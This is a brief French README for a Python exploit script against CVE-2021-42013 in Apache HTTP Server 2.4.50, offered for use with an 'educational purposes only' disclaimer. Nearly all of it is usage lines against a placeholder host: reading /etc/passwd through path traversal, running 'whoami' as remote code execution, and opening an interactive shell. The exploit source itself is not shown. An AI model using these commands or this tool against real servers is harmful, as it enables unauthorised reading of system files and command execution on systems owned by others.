
CVE-2021-42013 - Apache 2.4.50
Un script python3 pour le CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE. L'RCE nécessite que cgi-bin soit activé.
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
python3 apache_2.4.50.py -t http://apache.hack/ -shell
Pour le menu d'aide :
python3 apache_2.4.50.py -h
Tout le code fourni dans ce dépôt est uniquement à des fins éducatives et de recherche. Toute action et/ou activité liée au matériel contenu dans ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code contenu dans ce dépôt peut entraîner des poursuites pénales contre les personnes concernées. L'auteur ne pourra être tenu responsable en cas de poursuites pénales intentées contre des individus utilisant abusivement le code de ce dépôt pour enfreindre la loi.